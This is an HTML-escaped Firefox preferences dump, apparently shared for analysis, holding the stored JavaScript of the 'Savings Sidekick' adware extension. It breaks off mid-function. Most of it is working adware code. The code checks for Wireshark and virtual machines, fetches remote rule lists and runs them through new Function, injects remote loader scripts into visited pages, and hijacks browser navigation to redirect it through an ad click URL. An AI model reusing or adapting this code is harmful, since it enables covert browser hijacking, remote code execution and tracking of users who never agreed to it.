user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.expiration&quot;, &quot;Fri Nov 30 2012 23:20:51 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.value&quot;, &quot;true&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.value&quot;, &quot;%7B%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.value&quot;, &quot;%7B%22remoteId%22%3A0%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.value&quot;, &quot;%7B%22AnySoftware%22%3Afalse%2C%22Wireshark%22%3Afalse%2C%22VirtualBox%22%3Afalse%2C%22VMWare%22%3Afalse%2C%22InsideVM%22%3Afalse%2C%22InsideVMWare%22%3Afalse%2C%22InsideVirtualBox%22%3Afalse%2C%22InsideVirtualPc%22%3Afalse%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.js&quot;, &quot;\n\nif(\&quot;undefined\&quot;!=typeof _GPL_PLUGIN){var _GPL_=function(){_GPL_PLUGIN.started||_GPL_PLUGIN.prepare({pid:1224,baseCDN:\&quot;savingsside-a.akamaihd.net\&quot;})};$jquery(document).ready(_GPL_);setTimeout(_GPL_,5E3)};\n\n\n\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.manifesturl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.name&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.newtab&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.opensearch&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.code&quot;, &quot;appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id}else{return appAPI.appID}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:\&quot;hxxp://static.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/sidebar.css\&quot;,themes:\&quot;/plugins/images/sidebar\&quot;}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},statsBase:{production:\&quot;hxxp://nstats.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},geolocation:\&quot;hxxp://www.geoplugin.net/json.gp?jsoncallback=fn\&quot;,meta:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/meta.json\&quot;,messages:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/{id}.json\&quot;,logger:\&quot;/notifications.gif\&quot;,loggerAPI:\&quot;/api_notifications.gif\&quot;},notifications:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/notifications.css\&quot;,themes:\&quot;/plugins/images/notifications\&quot;}});$jquery.extend(appAPI._cr_config,{debug_app:{debug_page:[\&quot;crossrider.com\&quot;,\&quot;staging.crossrider.com\&quot;]}});$jquery.extend(appAPI._cr_config,{resources:{jQuery:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jquery/{version}/jquery.min.js\&quot;,cacheTime:10},jQueryUI:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jqueryui/{version}/jquery-ui.min.js\&quot;,cacheTime:10},base:{production:\&quot;hxxp://resources.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},update:\&quot;/apps/{appId}/resources/meta/{lastVersion}\&quot;}});(function(c){var b=!1,a=/xyz/.test(function(){})?/\\b_super\\b/:/.*/;c.Class=function(){};c.Class.extend=function(e){function j(){!b&amp;&amp;this.init&amp;&amp;this.init.apply(this,arguments)}var i=this.prototype;b=!0;var h=new this;b=!1;for(var g in e){h[g]=\&quot;function\&quot;==typeof e[g]&amp;&amp;\&quot;function\&quot;==typeof i[g]&amp;&amp;a.test(e[g])?function(f,d){return function(){var l=this._super;this._super=i[f];var k=d.apply(this,arguments);this._super=l;return k}}(g,e[g]):e[g]}j.prototype=h;j.prototype.constructor=j;j.extend=arguments.callee;return j}})($jquery_171);appAPI.JSONParser={};(function(){function k(a){return 10&gt;a?\&quot;0\&quot;+a:a}function o(a){p.lastIndex=0;return p.test(a)?&apos;\&quot;&apos;+a.replace(p,function(a){var c=r[a];return\&quot;string\&quot;===typeof c?c:\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})+&apos;\&quot;&apos;:&apos;\&quot;&apos;+a+&apos;\&quot;&apos;}function m(a,i){var c,d,h,n,g=e,f,b=i[a];b&amp;&amp;\&quot;object\&quot;===typeof b&amp;&amp;\&quot;function\&quot;===typeof b.to_appAPI_JSON&amp;&amp;(b=b.to_appAPI_JSON(a));\&quot;function\&quot;===typeof j&amp;&amp;(b=j.call(i,a,b));switch(typeof b){case\&quot;string\&quot;:return o(b);case\&quot;number\&quot;:return isFinite(b)?\&quot;\&quot;+b:\&quot;null\&quot;;case\&quot;boolean\&quot;:case\&quot;null\&quot;:return\&quot;\&quot;+b;case\&quot;object\&quot;:if(!b){return\&quot;null\&quot;}e+=l;f=[];if(\&quot;[object Array]\&quot;===Object.prototype.toString.apply(b)){n=b.length;for(c=0;c&lt;n;c+=1){f[c]=m(c,b)||\&quot;null\&quot;}h=0===f.length?\&quot;[]\&quot;:e?\&quot;[\\n\&quot;+e+f.join(\&quot;,\\n\&quot;+e)+\&quot;\\n\&quot;+g+\&quot;]\&quot;:\&quot;[\&quot;+f.join(\&quot;,\&quot;)+\&quot;]\&quot;;e=g;return h}if(j&amp;&amp;\&quot;object\&quot;===typeof j){n=j.length;for(c=0;c&lt;n;c+=1){d=j[c],\&quot;string\&quot;===typeof d&amp;&amp;(h=m(d,b))&amp;&amp;f.push(o(d)+(e?\&quot;: \&quot;:\&quot;:\&quot;)+h)}}else{for(d in b){Object.hasOwnProperty.call(b,d)&amp;&amp;(h=m(d,b))&amp;&amp;f.push(o(d)+(e?\&quot;: \&quot;:\&quot;:\&quot;)+h)}}h=0===f.length?\&quot;{}\&quot;:e?\&quot;{\\n\&quot;+e+f.join(\&quot;,\\n\&quot;+e)+\&quot;\\n\&quot;+g+\&quot;}\&quot;:\&quot;{\&quot;+f.join(\&quot;,\&quot;)+\&quot;}\&quot;;e=g;return h}}if(\&quot;function\&quot;!==typeof Date.prototype.to_appAPI_JSON){Date.prototype.to_appAPI_JSON=function(){return isFinite(this.valueOf())?this.getUTCFullYear()+\&quot;-\&quot;+k(this.getUTCMonth()+1)+\&quot;-\&quot;+k(this.getUTCDate())+\&quot;T\&quot;+k(this.getUTCHours())+\&quot;:\&quot;+k(this.getUTCMinutes())+\&quot;:\&quot;+k(this.getUTCSeconds())+\&quot;Z\&quot;:null},String.prototype.to_appAPI_JSON=Number.prototype.to_appAPI_JSON=Boolean.prototype.to_appAPI_JSON=function(){return this.valueOf()}}var q=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,p=/[\\\\\\\&quot;\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,e,l,r={\&quot;\\u0008\&quot;:\&quot;\\\\b\&quot;,\&quot;\\t\&quot;:\&quot;\\\\t\&quot;,\&quot;\\n\&quot;:\&quot;\\\\n\&quot;,\&quot;\\u000c\&quot;:\&quot;\\\\f\&quot;,\&quot;\\r\&quot;:\&quot;\\\\r\&quot;,&apos;\&quot;&apos;:&apos;\\\\\&quot;&apos;,\&quot;\\\\\&quot;:\&quot;\\\\\\\\\&quot;},j;if(\&quot;function\&quot;!==typeof appAPI.JSONParser.stringify){appAPI.JSONParser.stringify=function(a,i,c){var d;l=e=\&quot;\&quot;;if(\&quot;number\&quot;===typeof c){for(d=0;d&lt;c;d+=1){l+=\&quot; \&quot;}}else{\&quot;string\&quot;===typeof c&amp;&amp;(l=c)}if((j=i)&amp;&amp;\&quot;function\&quot;!==typeof i&amp;&amp;(\&quot;object\&quot;!==typeof i||\&quot;number\&quot;!==typeof i.length)){throw Error(\&quot;appAPI_JSON.stringify\&quot;)}return m(\&quot;\&quot;,{\&quot;\&quot;:a})}}if(\&quot;function\&quot;!==typeof appAPI.JSONParser.parse){appAPI.JSONParser.parse=function(a,e){function c(a,d){var g,f,b=a[d];if(b&amp;&amp;\&quot;object\&quot;===typeof b){for(g in b){Object.hasOwnProperty.call(b,g)&amp;&amp;(f=c(b,g),void 0!==f?b[g]=f:delete b[g])}}return e.call(a,d,b)}var d,a=\&quot;\&quot;+a;q.lastIndex=0;q.test(a)&amp;&amp;(a=a.replace(q,function(a){return\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)}));if(/^[\\],:{}\\s]*$/.test(a.replace(/\\\\(?:[\&quot;\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\&quot;@\&quot;).replace(/\&quot;[^\&quot;\\\\\\n\\r]*\&quot;|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\&quot;]\&quot;).replace(/(?:^|:|,)(?:\\s*\\[)+/g,\&quot;\&quot;))){return d=eval(\&quot;(\&quot;+a+\&quot;)\&quot;),\&quot;function\&quot;===typeof e?c({\&quot;\&quot;:d},\&quot;\&quot;):d}throw new SyntaxError(\&quot;appAPI_JSON.parse\&quot;)}}})();(function(a){appAPI.isMatchPages=function(){var c,b=false;a(a.makeArray(arguments)).each(function(d,e){c=typeof(e)==\&quot;string\&quot;?new RegExp(\&quot;^http.?\\\\:\\\\/\\\\/(?:www\\\\.)?\&quot;+e.replace(/\\\\/g,\&quot;\\\\\\\\\&quot;).replace(/\\./g,\&quot;\\\\.\&quot;).replace(/\\*/g,\&quot;.*\&quot;),\&quot;i\&quot;):e;if(c.test(document.location.href)){b=true}});return b}})($jquery_171);(function(a){a.fn.addBaseClass=function(b){return this.each(function(){var c=a(this).attr(\&quot;class\&quot;).split(\&quot; \&quot;)[0];a(this).attr(\&quot;class\&quot;,c+\&quot; \&quot;+b)})}})($jquery_171);(function(a){a.fn.fireExtensionEvent=function(b,c){return this.each(function(){c=c!=undefined?appAPI.JSONParser.stringify(c):\&quot;__crossrider_empty\&quot;;this.setAttribute(\&quot;crossrider_data_store_temp\&quot;,c);if(a.browser.msie){this.setAttribute(\&quot;fake_\&quot;+b,Math.random())}if(document.createEvent){var d=document.createEvent(\&quot;Events\&quot;);d.initEvent(\&quot;fake_\&quot;+b,true,false);this.dispatchEvent(d)}})}})($jquery_171);(function(a){a.fn.bindExtensionEvent=function(b,d){function c(e){var e=a(e),f;if(e.attr(\&quot;crossrider_data_store_temp\&quot;)!=\&quot;__crossrider_empty\&quot;){f=a.parseJSON(e.attr(\&quot;crossrider_data_store_temp\&quot;));return f}else{return null}}return this.each(function(){if(a.browser.msie){this.attachEvent(\&quot;onpropertychange\&quot;,a.proxy(function(){if(event.propertyName==\&quot;fake_\&quot;+b){d.call(this,a.event.fix(event),c(this))}},this))}else{this.addEventListener(\&quot;fake_\&quot;+b,a.proxy(function(f){d.call(this,a.event.fix(f),c(this))},this),false)}})}})($jquery_171);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.name&quot;, &quot;base&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.ver&quot;, 3);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.code&quot;, &quot;Array.prototype.indexOf||(Array.prototype.indexOf=function(a){if(void 0===this||null===this)throw new TypeError;var b=Object(this),d=b.length&gt;&gt;&gt;0;if(0===d)return-1;var c=0;0&lt;arguments.length&amp;&amp;(c=Number(arguments[1]),c!==c?c=0:0!==c&amp;&amp;c!==1/0&amp;&amp;c!==-(1/0)&amp;&amp;(c=(0&lt;c||-1)*Math.floor(Math.abs(c))));if(c&gt;=d)return-1;for(c=0&lt;=c?c:Math.max(d-Math.abs(c),0);c&lt;d;c++)if(c in b&amp;&amp;b[c]===a)return c;return-1});\nvar _GPL_PLUGIN={params:null,parent_zoneid:null,keys:{CHILD_CREATED:\&quot;_GPL_hotfix20111102645\&quot;,INSTALLER_PARAMS:\&quot;InstallerParams\&quot;,INSTALLER_PARAMS_BACKUP:\&quot;_GPL_installer_params\&quot;,INSTALLATION_TIME:\&quot;InstallationTime\&quot;,AOI:\&quot;_GPL_aoi\&quot;,ZONEID:\&quot;_GPL_zoneid\&quot;,PARENT_ZONEID:\&quot;_GPL_parent_zoneid\&quot;,PRODUCTID:\&quot;_GPL_product_id\&quot;,BGCODE:\&quot;_GPL_crr\&quot;,COUNTRY_CODE:\&quot;_GPL_country_code\&quot;,BLOCKLIST:\&quot;_GPL_blocklist\&quot;},recreate_child:!1,vars:{pid:21,systemid:appAPI.getCrossriderID()},proto:\&quot;https:\&quot;==document.location.protocol?\&quot;https://\&quot;:\n\&quot;hxxp://\&quot;,baseCDN:\&quot;contentcache-a.akamaihd.net\&quot;,countryCode:\&quot;\&quot;,blockList:[],started:!1,prepare:function(a){this.started=true;if(appAPI.db.get(\&quot;dbtest\&quot;)){if(a.baseCDN)this.baseCDN=a.baseCDN;if(a.pid)this.vars.pid=a.pid;if(appAPI.appInfo&amp;&amp;appAPI.appInfo.name)this.vars.ext=escape(appAPI.appInfo.name);this.problemCheck()}else{appAPI.db.set(\&quot;dbtest\&quot;,(new Date).getTime());setTimeout(function(){_GPL_PLUGIN.prepare(a)},250)}},problemCheck:function(){var a=appAPI.db.get(\&quot;_GPL_pc_20120828\&quot;),b=appAPI.db.get(this.keys.ZONEID);\n!a&amp;&amp;b&amp;&amp;b!=\&quot;0\&quot;?appAPI.request.get(\&quot;hxxp://cdnapps-a.akamaihd.net/tb/pz.php\&quot;,function(a){if(a!=\&quot;\&quot;)try{var c=(new Function(\&quot;return \&quot;+a))();if(c&amp;&amp;c.length&gt;0&amp;&amp;b&amp;&amp;b!=\&quot;0\&quot;){appAPI.db.set(\&quot;_GPL_pc_20120828\&quot;,(new Date).getTime());c.indexOf(b)!=-1||c.indexOf(\&quot;\&quot;+b)!=-1?_GPL_PLUGIN.zoneFix():_GPL_PLUGIN.loadGeo()}}catch(e){}},function(){}):this.loadGeo()},loadGeo:function(){var a=appAPI.db.get(this.keys.COUNTRY_CODE);if(a){_GPL_PLUGIN.countryCode=a;_GPL_PLUGIN.loadBlockList()}else appAPI.request.get(\&quot;hxxp://\&quot;+\nthis.baseCDN+\&quot;/loaders/cid?r=\&quot;+(new Date).getTime(),function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.preinit();else try{var d=(new Function(\&quot;return \&quot;+a.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();if(d&amp;&amp;d.cid&amp;&amp;d.cid!=\&quot;\&quot;){appAPI.db.set(_GPL_PLUGIN.keys.COUNTRY_CODE,d.cid,appAPI.time.daysFromNow(7));_GPL_PLUGIN.countryCode=d.cid;_GPL_PLUGIN.loadBlockList()}}catch(c){_GPL_PLUGIN.preinit()}},function(){_GPL_PLUGIN.preinit()})},loadBlockList:function(){var a=appAPI.db.get(this.keys.BLOCKLIST);if(!a&amp;&amp;this.countryCode!=\&quot;\&quot;)appAPI.request.get(\&quot;hxxp://cdnhigh-a.akamaihd.net/blocklist/\&quot;+\nthis.countryCode+\&quot;/?r=\&quot;+(new Date).getTime(),function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.preinit();else try{var d=(new Function(\&quot;return \&quot;+a))();if(d&amp;&amp;d!=\&quot;\&quot;){appAPI.db.set(_GPL_PLUGIN.keys.BLOCKLIST,d.join(\&quot;,\&quot;),appAPI.time.minutesFromNow(5));_GPL_PLUGIN.blockList=d;_GPL_PLUGIN.preinit()}}catch(c){_GPL_PLUGIN.preinit()}},function(){_GPL_PLUGIN.preinit()});else{_GPL_PLUGIN.blockList=typeof a==\&quot;string\&quot;?a.split(\&quot;,\&quot;):[];_GPL_PLUGIN.preinit()}},preinit:function(){if(this.blockList.length&gt;0){if(this.blockList.indexOf(\&quot;*\&quot;)&gt;\n0)return;for(var a=this.getDomainVariations(document.location.hostname.toLowerCase()),b=0,d=a.length;b&lt;d;b++)if(this.blockList.indexOf(a[b])&gt;=0)return}if(appAPI.installer&amp;&amp;typeof appAPI.installer.getInstalledSoftware==\&quot;function\&quot;)(a=appAPI.installer.getInstalledSoftware())&amp;&amp;a.AnySoftware&amp;&amp;appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,Math.floor((new Date).getTime()/1E3));this.loadEssentials();this.loadExtras()&amp;&amp;this.loadFinal()},loadFinal:function(){if(appAPI.db.get(this.keys.CHILD_CREATED)==null||this.recreate_child){this.createChild();\nthis.recreate_child=false}else this.init()},loadEssentials:function(){this.loadParams();this.loadAOI();this.loadZone();this.loadPID()},init:function(){var a=\&quot;\&quot;;$jquery.each(this.vars,function(b,d){a=a+(b+\&quot;=\&quot;+d+\&quot;&amp;\&quot;)});a=a.substring(0,a.length-1);this.insertJS(this.proto+this.baseCDN+\&quot;/loaders/\&quot;+this.vars.pid+\&quot;/l.js?\&quot;+a)},insertJS:function(a){var b=document.getElementsByTagName(\&quot;head\&quot;),b=b.length&gt;0?b:document.getElementsByTagName(\&quot;body\&quot;);if(b.length&gt;0){var d=document.createElement(\&quot;script\&quot;);d.async=\ntrue;d.type=\&quot;text/javascript\&quot;;d.src=a;b[0].appendChild(d)}},formatDate:function(a){var a=parseInt(a),b=new Date(parseInt(a)*1E3),a=b.getDate(),d=b.getMonth(),b=b.getFullYear();return[\&quot;Jan\&quot;,\&quot;Feb\&quot;,\&quot;Mar\&quot;,\&quot;Apr\&quot;,\&quot;May\&quot;,\&quot;Jun\&quot;,\&quot;Jul\&quot;,\&quot;Aug\&quot;,\&quot;Sep\&quot;,\&quot;Oct\&quot;,\&quot;Nov\&quot;,\&quot;Dec\&quot;][d]+\&quot; \&quot;+a+\&quot;, \&quot;+b},loadParams:function(){(this.params=appAPI.db.get(this.keys.INSTALLER_PARAMS))&amp;&amp;appAPI.db.set(this.keys.INSTALLER_PARAMS_BACKUP,this.params);this.params=this.params||{};if(!this.params.uzid||this.params.uzid==\&quot;0\&quot;)this.params.uzid=\n\&quot;14019&amp;pid=\&quot;+this.vars.pid},loadAOI:function(){var a=appAPI.db.get(this.keys.INSTALLATION_TIME),a=a&amp;&amp;a!=\&quot;0\&quot;?a:appAPI.db.get(this.keys.AOI);if(!a||a==\&quot;0\&quot;)a=\&quot;\&quot;+Math.floor((new Date).getTime()/1E3);appAPI.db.set(this.keys.AOI,a);this.vars.aoi=a},loadZone:function(){var a=appAPI.db.get(this.keys.ZONEID);if(!a||a==\&quot;0\&quot;)a=this.params.uzid;typeof a==\&quot;string\&quot;&amp;&amp;a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.split(\&quot;&amp;\&quot;)[0]);appAPI.db.set(this.keys.ZONEID,a);this.vars.zoneid=a;a=appAPI.db.get(this.keys.PARENT_ZONEID);if(!a||a==\&quot;0\&quot;){(a=\nthis.params.uzid?this.params.uzid:appAPI.db.get(this.keys.PARENT_ZONEID))&amp;&amp;a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.split(\&quot;&amp;\&quot;)[0]);appAPI.db.set(this.keys.PARENT_ZONEID,a)}this.parent_zoneid=a},loadPID:function(){var a=appAPI.db.get(this.keys.PRODUCTID);if((!a||a==\&quot;0\&quot;)&amp;&amp;typeof this.params.uzid==\&quot;string\&quot;&amp;&amp;this.params.uzid.indexOf(\&quot;pid=\&quot;)!=-1){a=this.params.uzid.substring(this.params.uzid.indexOf(\&quot;pid=\&quot;)+4);a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.substring(0,a.indexOf(\&quot;&amp;\&quot;)));appAPI.db.set(this.keys.PRODUCTID,a)}this.vars.pid=a||\nthis.vars.pid},loadExtras:function(){if(appAPI.db.get(this.keys.BGCODE)!=null)this.vars.crr=Math.floor((new Date).getTime()/1E3);if(this.params&amp;&amp;(this.params.uzid&amp;&amp;this.params.uzid!=\&quot;0\&quot;)&amp;&amp;(this.parent_zoneid&amp;&amp;this.parent_zoneid!=\&quot;0\&quot;&amp;&amp;this.params.uzid.indexOf(this.parent_zoneid)!=0||this.vars.pid&amp;&amp;this.vars.pid!=\&quot;0\&quot;&amp;&amp;this.params.uzid.indexOf(\&quot;pid=\&quot;+this.vars.pid)==-1||this.parent_zoneid&amp;&amp;this.vars.zoneid&amp;&amp;this.parent_zoneid==this.vars.zoneid||!this.parent_zoneid||this.parent_zoneid==\&quot;0\&quot;)){this.zoneFix();\nreturn false}return true},zoneFix:function(){this.recreate_child=true;appAPI.db.set(this.keys.ZONEID,\&quot;0\&quot;);appAPI.db.set(this.keys.PARENT_ZONEID,\&quot;0\&quot;);appAPI.db.set(this.keys.PRODUCTID,\&quot;0\&quot;);_GPL_PLUGIN.timer=setInterval(function(){if(appAPI.db.get(_GPL_PLUGIN.keys.ZONEID)==\&quot;0\&quot;){clearInterval(_GPL_PLUGIN.timer);_GPL_PLUGIN.loadEssentials();_GPL_PLUGIN.loadFinal()}},250)},createChild:function(){var a=\&quot;hxxp://cdnapps-a.akamaihd.net/tb/gz.php?keyset_id=\&quot;+escape(this.formatDate(this.vars.aoi))+\&quot;&amp;xml&amp;rev=0&amp;parent_zone=\&quot;+\nparseInt(this.parent_zoneid)+\&quot;&amp;is_date\&quot;;appAPI.request.get(a,function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.vars.zoneid=12199;else{a=(doc=a.match(/zoneid&gt;(\\d+)&lt;/i))?doc[1]:0;if(parseInt(a)&gt;0){appAPI.db.set(_GPL_PLUGIN.keys.ZONEID,\&quot;\&quot;+a);appAPI.db.set(_GPL_PLUGIN.keys.CHILD_CREATED,\&quot;1\&quot;);_GPL_PLUGIN.vars.zoneid=a}else _GPL_PLUGIN.vars.zoneid=12199}_GPL_PLUGIN.init()},function(){_GPL_PLUGIN.init()})},getDomainVariations:function(a){var b=[],a=a.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),d=a.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?\n3:2;do{var c=a.join(\&quot;.\&quot;);b.push(c);a.shift()}while(a.length&gt;=d);return b}};&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.name&quot;, &quot;GPL Plugin (Loader)&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.ver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.code&quot;, &quot;var _GPL_BG={vars:{},rules:{},started:!1,log:function(d){console.log(d)},factor:1,preinit:function(){null!=appAPI.db.get(\&quot;_GPL_zoneid\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_product_id\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_aoi\&quot;)?(_GPL_BG.vars.zoneid=appAPI.db.get(\&quot;_GPL_zoneid\&quot;),_GPL_BG.vars.pid=appAPI.db.get(\&quot;_GPL_product_id\&quot;),_GPL_BG.vars.aoi=parseInt(appAPI.db.get(\&quot;_GPL_aoi\&quot;)),appAPI.db.set(\&quot;_GPL_crr\&quot;,Math.floor((new Date).getTime()/1E3)),_GPL_BG.init()):setTimeout(function(){_GPL_BG.preinit()},1E3)},init:function(){var d=\nappAPI.db.get(\&quot;_GPL_country_code\&quot;);!d||\&quot;\&quot;==d?appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/loaders/cid?r=\&quot;+(new Date).getTime(),function(d){if(\&quot;\&quot;==d)setTimeout(function(){_GPL_BG.init()},1E4);else try{var a=(new Function(\&quot;return \&quot;+d.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();a&amp;&amp;(a.cid&amp;&amp;\&quot;\&quot;!=a.cid)&amp;&amp;(appAPI.db.set(\&quot;_GPL_country_code\&quot;,a.cid,appAPI.time.daysFromNow(7)),_GPL_BG.vars.cid=a.cid,_GPL_BG.loadRules())}catch(b){setTimeout(function(){_GPL_BG.init()},1E4)}},function(){setTimeout(function(){_GPL_BG.init()},\n1E4)}):(_GPL_BG.vars.cid=d,_GPL_BG.loadRules());setInterval(function(){_GPL_BG.factor=1;_GPL_BG.loadRules()},108E5)},loadRules:function(){appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/srr/\&quot;+_GPL_BG.vars.cid+\&quot;/?r=\&quot;+(new Date).getTime(),function(d){if(d=(new Function(\&quot;return \&quot;+d))())_GPL_BG.rules=d,_GPL_BG.started||_GPL_BG.vars.pid in _GPL_BG.rules.p&amp;&amp;Math.floor((new Date).getTime()/1E3)-_GPL_BG.vars.aoi&gt;=parseInt(_GPL_BG.rules.p[_GPL_BG.vars.pid].min)&amp;&amp;_GPL_BG.captureRequests()},function(){setTimeout(function(){_GPL_BG.loadRules();\n_GPL_BG.factor*=2},6E4*_GPL_BG.factor)})},captureRequests:function(){_GPL_BG.started=!0;appAPI.onRequest(function(d,h){var a;if(null==appAPI.db.get(\&quot;_GPL_sr_halt\&quot;)&amp;&amp;(h&amp;&amp;(-1==h.indexOf(\&quot;://\&quot;)&amp;&amp;(h=\&quot;hxxp://\&quot;+h),a=_GPL_BG.processRequest(\&quot;nav\&quot;,_GPL_BG.parse_url(h),h))||d&amp;&amp;(-1==d.indexOf(\&quot;://\&quot;)&amp;&amp;(d=\&quot;hxxp://\&quot;+d),a=_GPL_BG.processRequest(\&quot;resource\&quot;,_GPL_BG.parse_url(d),d))))return a})},processRequest:function(d,h,a){if(!h.host||null!=appAPI.db.get(\&quot;_GPL_crrs\&quot;))return!1;h=_GPL_BG.getRules(h,d);if(0==h.length)return!1;\nif(\&quot;nav\&quot;==d)return d=h[Math.floor(Math.random()*h.length)],appAPI.db.set(\&quot;_GPL_sr[\&quot;+d.d+\&quot;]\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.hoursFromNow(parseInt(d.h))),appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.minutesFromNow(15)),{redirectTo:_GPL_BG.getClickUrl(a)};if(\&quot;resource\&quot;==d)return{cancel:!0}},getRules:function(d,h){var a=[],b=\&quot;nav\&quot;==h?_GPL_BG.getDomainVariations(d.host):[d.host.toLowerCase()],f=((d.path?d.path:\&quot;\&quot;)+(d.query?\&quot;?\&quot;+d.query:\&quot;\&quot;)+(d.fragment?\n\&quot;#\&quot;+d.fragment:\&quot;\&quot;)).toLowerCase(),c;if(!b||0==b.length)return a;for(var e=0,m=b.length;e&lt;m;e++){var g=this.MD5.md5(b[e]);if(_GPL_BG.rules[g])for(var i=0,l=_GPL_BG.rules[g].length;i&lt;l;i++)_GPL_BG.rules[g][i].t==h&amp;&amp;f.match(_GPL_BG.rules[g][i].k.toLowerCase())&amp;&amp;(_GPL_BG.rules[g][i].d=b[e],\&quot;resource\&quot;==h?a.push(_GPL_BG.rules[g][i]):(c=appAPI.db.get(\&quot;_GPL_sr[\&quot;+b[e]+\&quot;]\&quot;),null==c&amp;&amp;a.push(_GPL_BG.rules[g][i])))}return a},getClickUrl:function(d){return\&quot;https://clicks.ads2srv.com/click?sr=\&quot;+escape(d).replace(/\\//g,\n\&quot;%2F\&quot;)+\&quot;&amp;zone=\&quot;+escape(_GPL_BG.vars.zoneid)},getDomainVariations:function(d){var d=d.toLowerCase(),h=[],d=d.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),a=d.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?3:2;do{var b=d.join(\&quot;.\&quot;);h.push(b);d.shift()}while(d.length&gt;=a);return h},MD5:{hexcase:0,b64pad:\&quot;\&quot;,md5:function(d){return this.rstr2hex(this.rstr_md5(this.str2rstr_utf8(d)))},rstr_md5:function(d){return this.binl2rstr(this.binl_md5(this.rstr2binl(d),8*d.length))},rstr2hex:function(d){for(var h=this.hexcase?\n\&quot;0123456789ABCDEF\&quot;:\&quot;0123456789abcdef\&quot;,a=\&quot;\&quot;,b,f=0;f&lt;d.length;f++)b=d.charCodeAt(f),a+=h.charAt(b&gt;&gt;&gt;4&amp;15)+h.charAt(b&amp;15);return a},str2rstr_utf8:function(d){for(var 